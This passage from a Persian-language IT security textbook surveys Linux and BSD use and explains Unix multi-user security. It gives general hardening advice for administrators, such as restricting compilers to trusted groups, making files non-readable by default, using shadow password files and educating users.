‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻭ ﺩﺭ ﻭﺳﻌﺖ ﻛﻤﺘﺮ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺑﺴﺘﺮ ﻋﻤﻮﻣﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﻭﻣﻴﺰﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻨـﺪ‪ .‬ﻣـﺸﺎﻏﻞ‬
‫ﺑﺠﺎﻱ ﺧﺮﻳﺪ ﺍﺑﺮﺭﺍﻳﺎﻧﻪﻫﺎ‪ ،‬ﺧﻮﺷﻪﻫﺎﻱ ﺑﺰﺭﮒ ‪ Linux‬ﺭﺍ ‪ -‬ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺴﺎﺋﻞ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺰﺭﮒ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺍﺟـﺮﺍﻱ ﻣـﻮﺍﺯﻱ ﺣـﻞ ﻛﻨﻨـﺪ ‪-‬‬
‫ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺑﻪ ﻃﻮﺭ ﻣﺸﺎﺑﻪ ‪ ،NetBSD ،FreeBSD‬ﻭ ‪ OpenBSD‬ﺑﺨﻮﺑﻲ ﻣﻨﺎﺳﺐ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺩﻫـﺎ ﻫـﺴﺘﻨﺪ ﻭ ﺑـﻪ ﻣﻴـﺰﺍﻥ ﻭﺳـﻴﻊ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﺮﺍﺳﺎﺱ ﺷﻮﺍﻫﺪ ﻏﻴﺮ ﺭﺳﻤﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ‪ Linux‬ﻧﺴﺒﺖ ﺑﻪ ﻫﺮ ﺳﻴـﺴﺘﻢ ﺩﻳﮕـﺮ‪ ،‬ﺭﺷـﺪ ﻛـﺎﺭﺑﺮﺍﻥ ﺑﻴـﺸﺘﺮﻱ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻃﺒﻖ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻋﻼﻡﺷﺪﺓ ﺗﺠﺎﺭﻱ ﺍﺯ ﺟﻤﻠﻪ ﺭﻳﺴﻜﻬﺎﻱ ﺍﻋﻼﻡﺷﺪﻩ ﺗﻮﺳﻂ ﺷﺮﻛﺖ ‪ ،Sun Microsystems‬ﺑﻨﻈﺮ ﻣـﻲﺭﺳـﺪ‬
‫‪ Linux‬ﻣﻮﺍﺯﻧﺔ ﺭﺷﺪ ﺑﻬﺘﺮﻱ ﺩﺭ ﺑﺎﺯﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ‪ ،‬ﺣﺪﺍﻗﻞ ﺑﻪ ﺩﻟﻴﻞ ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﻭ ﻛﺎﺭﺍﻳﻲ‪ ،‬ﻣﺎ ﺍﺯ ﮔﻮﻧـﻪﻫـﺎﻱ ﺩﻳﮕـﺮ‬
‫‪BSD‬ﻫﺎ ﺍﻧﺘﻈﺎﺭ ﻣﺤﻮ ﺷﺪﻥ ﻧﺪﺍﺭﻳﻢ؛ ﺯﻳﺮﺍ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﮔﺮﻭﻩﻫﺎﻱ ‪BSD‬ﻫﺎ ﺑﻪ ﺣﻴﺎﺕ ﺟﺪﺍﮔﺎﻧﺔ ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ ﻛـﻪ ﺍﺯ‬
‫ﺳﻬﻢ ﺑﺎﺯﺍﺭ ‪ Linux‬ﺑﻬﺮﻩﺍﻱ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Linux‬ﻭ ‪ BSD‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺗﻨﻬﺎ ﺑﺎ ﻳﻚ ﻓﻼﭘﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻧﺴﺨﻪﻫﺎ ﻛﻪ‬
‫ﺷﺎﻣﻞ ‪ picoBSD ،Trinix‬ﻭ ‪ closedBSD‬ﻫﺴﺘﻨﺪ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩﻫﺎﻳﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺍﻣﻨﻴﺖ ﺯﻳـﺎﺩ ﻻﺯﻡ ﺍﺳـﺖ‪ ،‬ﺍﺯ ﺟﻤﻠـﻪ‬
‫ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ‪ ،‬ﺗﺮﻣﻴﻢ‪ ،‬ﻭ ﻟﻮﺍﺯﻡ ﺷﺒﻜﻪ‪.‬‬

‫ﺍﻣﻨﻴﺖ ﻭ ‪Unix‬‬

‫ﻫﻤﺎﻧﻨﺪ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺳـﺎﺱ ﺁﻧﻬـﺎ ﺑـﺮ ﭘﺎﻳـﺔ ‪ Microsoft Windows NT‬ﺍﺳـﺖ‪ Unix ،‬ﻳـﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﭼﻨـﺪﻛﺎﺭﺑﺮﻩ‪ ٢٦‬ﻭ‬
‫ﭼﻨﺪﻭﻇﻴﻔﻪﺍﻱ‪ ٢٧‬ﺍﺳﺖ‪ .‬ﻣﻨﻈﻮﺭ ﺍﺯ ﭼﻨﺪﻛﺎﺭﺑﺮﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺩﺭ ﻳﻚ ﺯﻣﺎﻥ ﺍﻓﺮﺍﺩ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ‪.‬‬
‫ﭼﻨﺪﻭﻇﻴﻔﻪﺍﻱ ﻧﻴﺰ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﻫﺮ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ‪ .‬ﻳﻜـﻲ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ‬
‫ﻃﺒﻴﻌﻲ ﭼﻨﻴﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺗﺪﺍﺧﻞ ﻛﺎﺭ ﭼﻨﺪ ﻧﻔﺮ )ﻳﺎ ﭼﻨﺪ ﺑﺮﻧﺎﻣﻪ( ﻣﺨﺘﻠـﻒ ﻛـﻪ ﺍﺯ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺑﻄـﻮﺭ ﻫﻤﺰﻣـﺎﻥ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪ .‬ﺑﺪﻭﻥ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﺣﻔﺎﻇﺘﻲ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺧﻮﺩﺳﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﺩﻫـﺪ‪،‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﭘﺎﻙ ﻛﻨﺪ‪ ،‬ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﻞ ﻛﺎﺭ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻣﺨﺘﻞ ﻧﻤﺎﻳﺪ‪ .‬ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﭼﻨـﻴﻦ‬
‫ﺳﻮﺍﻧﺤﻲ‪ ،‬ﻧﻮﻋﻲ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﻤﻮﺍﺭﻩ ﺩﺭ ﻓﻠﺴﻔﻪ ﻃﺮﺍﺣﻲ ‪ Unix‬ﺟﺎﻳﻲ ﺩﺍﺷﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﺍﻣﻨﻴﺖ ‪ Unix‬ﺗﺴﻬﻴﻼﺗﻲ ﺑﻴﺶ ﺍﺯ ﺣﻔﺎﻇﺖ ﺻﺮﻑ ﺍﺯ ﺣﺎﻓﻈﻪ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ‪ Unix .‬ﺩﺍﺭﺍﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻣﻨﻴﺘﻲ ﻣﺠﻬﺰ ﺍﺳﺖ ﻛـﻪ ﺭﺍﻫﻬـﺎﻳﻲ‬
‫ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﻭ ﺍﺯ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ ﺭﺍ ﻛﻨﺘـﺮﻝ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺯﻣﺎﻧﻴﻜﻪ ﺳﻴﺴﺘﻢ ﺩﺭﺳﺖ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﺑﺪﻭﻥ ﺩﻗﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪ ،‬ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﺍﺷﻜﺎﻝ ﺍﺳﺖ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﺪ‪ ،‬ﺍﻳﻦ ﻣﻜﺎﻧﻴﺰﻣﻬﺎ ﻛﻤﻚ ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﻛﻨﻨﺪ‪ .‬ﺗﻘﺮﻳﺒﹰﺎ ﺗﻤﺎﻡ ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻃﻲ ﺳﺎﻟﻬﺎﻱ ﻣﺘﻤﺎﺩﻱ ﺩﺭ ‪ Unix‬ﭘﻴﺪﺍ ﺷﺪﻩﺍﻧـﺪ ﺭﻳـﺸﻪ ﺩﺭ‬
‫ﺍﻳﻨﮕﻮﻧﻪ ﻣﺴﺎﺋﻞ ﺩﺍﺷﺘﻪﺍﻧﺪ ﺗﺎ ﻧﺎﺭﺳﺎﻳﻲﻫﺎﻱ ﻃﺮﺍﺣﻲ ﺩﺭﻭﻧﻲ ﺳﻴﺴﺘﻢ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ‪ Unix‬ﻣﻌﺘﻘﺪﻧﺪ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻳـﻚ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻧﺴﺒﺘﹰﺎ ﻣﻄﻤﺌﻦ ﺭﺍ ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪ‪ .‬ﻣﺎ ﻣﻌﺘﻘﺪﻳﻢ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦﺗـﺮ ﺑﺎﺷـﻨﺪ‪،‬‬
‫ﺍﻣﺎ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻣﺴﺎﺋﻠﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻋﻠﻴﻪ ﺍﻣﻨﻴﺖ ﺑﻴﺸﺘﺮ ﺩﺭ ﺍﻳﻦ ﻣﺤﻴﻂ ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻨﺪ‪.‬‬

‫ﺍﻧﺘﻈﺎﺭﺍﺕ ﻭ ﺍﻣﻴﺪﻭﺍﺭﻳﻬﺎ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﻄﻮﺭ ﺑﺎﺭ ﺁﻣﺪﻩﺍﻧﺪ ﻛﻪ ‪ Unix‬ﺭﺍ ﺑﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺧﺎﺻﻲ ﺑﺒﻴﻨﻨﺪ‪ .‬ﺗﺠﺮﺑﺔ ﺁﻧﻬﺎ ﺍﺯ ‪ Unix‬ﺩﺭ ﻛﺎﺭﻫـﺎﻱ ﻋﻠﻤـﻲ‪ ،‬ﺳـﺮﮔﺮﻣﻲ‪ ،‬ﻭ‬
‫ﺗﺤﻘﻴﻘﺎﺗﻲ‪ ،‬ﻫﻤﻴﺸﻪ ﺍﻳﻨﻄﻮﺭ ﺑﻮﺩﻩ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺑﻪ ﻫﻤﺔ ﺷﺎﺧﻪﻫﺎ ﻭ ﺍﻏﻠﺐ ﻓﺮﺍﻣﻴﻦ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪﺍﻧﺪ‪ .‬ﻛـﺎﺭﺑﺮﺍﻥ ﺷـﺎﻳﺪ ﻋـﺎﺩﺕ ﻛـﺮﺩﻩ‬
‫ﺑﺎﺷﻨﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻳﺸﺎﻥ ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺑﺮﺍﻱ ﻋﻤﻮﻡ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﺎﺷﻨﺪ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ﻫﻤﭽﻨﻴﻦ ﻏﺎﻟﺒﹰﺎ ﻋﺎﺩﺕ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﻧﺮﻡﺍﻓـﺰﺍﺭ‬
‫ﻻ ﺩﺳﺘﺮﺳﻲ ﺳﻄﺢ ﺳﻴﺴﺘﻤﻲ )ﺑﺎﻻﺗﺮﻳﻦ ﺳﻄﺢ ﺩﺳﺘﺮﺳـﻲ( ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺁﻥ ﻻﺯﻡ‬ ‫ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩﺷﺎﻥ ﺭﺍ ﺑﺴﺎﺯﻧﺪ ﻭ ﻧﺼﺐ ﻛﻨﻨﺪ؛ ﻛﺎﺭﻱ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺳﺖ‪.‬‬

‫‪26‬‬ ‫‪Multi User‬‬


‫‪27‬‬ ‫‪Multitask‬‬
‫‪٢٦٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﺔ ﺍﻳﻦ ﺍﻧﺘﻈﺎﺭﺍﺕ ﺧﻼﻑ ﻳﻚ ﻣﻨﺶ ﺧﻮﺏ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺍﻣﻨﻴـﺖ ﻗـﻮﻱﺗـﺮ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﻢ ﻻﺯﻡ ﺍﺳـﺖ ﻣـﺪﻳﺮﺍﻥ ﻭ‬
‫ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎ ﮔﻬﮕﺎﻩ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﻭ ﻓﺮﺍﻣﻴﻨﻲ ﻛﻪ ﭼﻨﺪﺍﻥ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺍﻧﺠﺎﻡ ﻭﻇﺎﻳﻔـﺸﺎﻥ ﻧﻴـﺴﺘﻨﺪ ﺭﺍ ﻣﺤـﺪﻭﺩ‬
‫ﮐﻨﻨﺪ‪ .‬ﺑﺮ ﺍﻳﻦ ﺍﺳﺎﺱ ﻛﺴﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﺵ ﺑﻪ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﭘﺮﺩﺍﺯﺷﮕﺮ ﻣﺘﻨﻲ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻻﺯﻡ ﻧﻴﺴﺖ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ﻛـﻪ‬
‫ﺑﺘﻮﺍﻧﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺤﻠﻴﻠﮕﺮ ﺷﺒﻜﻪ ﻭ ﻛﺎﻣﭙﺎﻳﻠﺮ ‪ C‬ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ‪ ،‬ﻛﺎﺭﺑﺮﺍﻥ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ ﻛـﻪ‬
‫ﺁﺯﻣﺎﻳﺶ ﻧﺸﺪﻩ ﻭ ﺗﻮﺳﻂ ﻳﻚ ﻓﺮﺩ ﺩﻭﺭﻩﺩﻳﺪﻩ ﻭ ﻣﺠﺎﺯ ﺗﺄﻳﻴﺪ ﻧﺸﺪﻩ ﺭﺍ ﻧﺼﺐ ﻛﻨﻨﺪ‪.‬‬
‫ﺭﺍﻫﺒﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻛﺎﺭﺑﺮﺩ ﺑﺮﺧﻲ ﺍﺯ ﺍﺻﻮﻝ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﺣﺪ ﻣﻌﻘﻮﻝ‪ ،‬ﺿﺮﻳﺐ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﺎﻻ ﺑﺒﺮﻧـﺪ‪ .‬ﺑـﺮﺍﻱ ﻧﻤﻮﻧـﻪ ﺑﺠـﺎﻱ ﺣـﺬﻑ ﻫﻤـﺔ‬
‫ﻛﺎﻣﭙﺎﻳﻠﺮﻫﺎ ﻭ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ ﺍﺯ ﻫﺮ ﺩﺳﺘﮕﺎﻩ‪ ،‬ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺷﻮﻧﺪ ﻛﻪ ﻓﻘﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻀﻮ ﺩﺭ ﻳـﻚ ﮔـﺮﻭﻩ ﻛـﺎﺭﺑﺮﻱ‬
‫ﺧﺎﺹ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻧﻴﺎﺯﻣﻨﺪ ﺍﻳﻨﮕﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ ﻫﺴﺘﻨﺪ ﻭ ﻛﺴﺎﻧﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺁﻧﻬـﺎ ﺍﻋﺘﻤـﺎﺩ ﻛـﺮﺩ‬
‫ﻛﻪ ﺩﻗﺘﻬﺎﻱ ﻻﺯﻡ ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﻨﻨﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻦ ﮔﺮﻭﻩ ﻛﺎﺭﺑﺮﻱ ﺍﻓﺰﻭﺩﻩ ﺷﻮﻧﺪ‪ .‬ﺭﻭﺷﻬﺎﻱ ﻣﺸﺎﺑﻬﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﺭﺩﻩﻫـﺎﻱ ﺍﺑـﺰﺍﺭ‬
‫ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ‪ ،‬ﻣﺎﻧﻨﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻛﻨﺘﺮﻝ ﺷﺒﻜﻪ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺧﺒﺎﺭ ‪ .Usenet‬ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺗﻐﻴﻴﺮ ﺩﻳﺪﮔﺎﻩ ﺳﻨﺘﻲ ﺑﻪ "ﺩﺍﺩﻩ" ﺩﺭ ﻳﻚ ﺳﻴﺴﺘﻢ‬
‫)ﺍﺯ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﻮﺩﻥ ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺑﻪ ﻏﻴﺮ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﻮﺩﻥ ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ( ﻣﻲﺗﻮﺍﻧﺪ ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪ .‬ﺑـﺮﺍﻱ ﻣﺜـﺎﻝ ﻓﺎﻳﻠﻬـﺎ ﻭ ﺷـﺎﺧﻪﻫـﺎﻱ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺑﺠﺎﻱ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﻮﺩﻥ ﺑﺮﺍﻱ ﻫﻤﻪ‪ ،‬ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺑﺎﻳﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻧﺪﻥ ﻣﺤﺎﻓﻈﺖ ﺷـﻮﻧﺪ‪ .‬ﺗﻨﻈـﻴﻢ ﺻـﺤﻴﺢ‬
‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎ‪ ،‬ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺳﺎﻳﻪﺍﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ٢٨‬ﺩﻭ ﻣﺜﺎﻝ ﻫﺴﺘﻨﺪ ﻛﻪ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﭼﮕﻮﻧﻪ ﺍﻳﻦ ﺗﻐﻴﻴﺮ ﺳﺎﺩﻩ‬
‫ﺩﺭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﻨﻴﺖ ﺭﺍ ﺩﺭ ﺗﻤﺎﻡ ‪ Unix‬ﺑﻬﺒﻮﺩ ﺑﺨﺸﺪ‪.‬‬
‫ﺣﻴﺎﺗﻲﺗﺮﻳﻦ ﻭﺟﻪ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ ‪ Unix‬ﻭﺍﺩﺍﺭ ﻛﺮﺩﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﻣﺸﺎﺭﻛﺖ ﺩﺭ ﺑﺮﺁﻭﺭﺩﻩ ﺷﺪﻥ ﺍﻧﺘﻈﺎﺭﺍﺕ ﺍﺳﺖ‪ .‬ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﺍﮔﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺑـﻪ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺷﺨﺼﻲ ﻗﺒﻞ ﺍﺯ ‪ Microsoft Windwos NT‬ﻋﺎﺩﺕ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ ﺍﻳﻦ ﺗﻮﺻﻴﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴـﺖ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻣﺒﺘﻨﻲ ﺑﺮ ‪ NT‬ﻧﻴﺰ ﺻﺪﻕ ﻣﻲﻛﻨﺪ‪ .‬ﺭﺍﻩ ﺭﺳﻴﺪﻥ ﺑﻪ ﺍﻳﻦ ﻫﺪﻑ ﺻﺪﻭﺭ ﺑﺨﺸﻨﺎﻣﻪ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﺗﺤـﺼﻴﻼﺕ‪ ،‬ﺁﮔـﺎﻫﻲ‪ ،‬ﻭ ﺍﻳﺠـﺎﺩ ﺍﻧﮕﻴـﺰﻩ ﺍﺳـﺖ‪.‬‬
‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﻓﻨﻲ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻫﺴﺘﻨﺪ‪ ،‬ﻭﻟﻲ ﺗﺠﺮﺑﻪ ﻛﺮﺍﺭﹰﺍ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﻛﻪ ﻣﺸﻜﻼﺕ ﻓﺮﺩﻱ ﺑﺎ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑـﺮ ﻓﻨـﺎﻭﺭﻱ ﻗﺎﺑـﻞ ﺣـﻞ‬
‫ﻧﻴﺴﺘﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺩﺭ ﻣﺤﻴﻄﻲ ﺷﺮﻭﻉ ﻛﺮﺩﻧﺪ ﻛﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﻧﭽـﻪ ﺍﻣـﺮﻭﺯﻩ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻫـﺴﺘﻨﺪ ﻛﻤﺘـﺮ‬
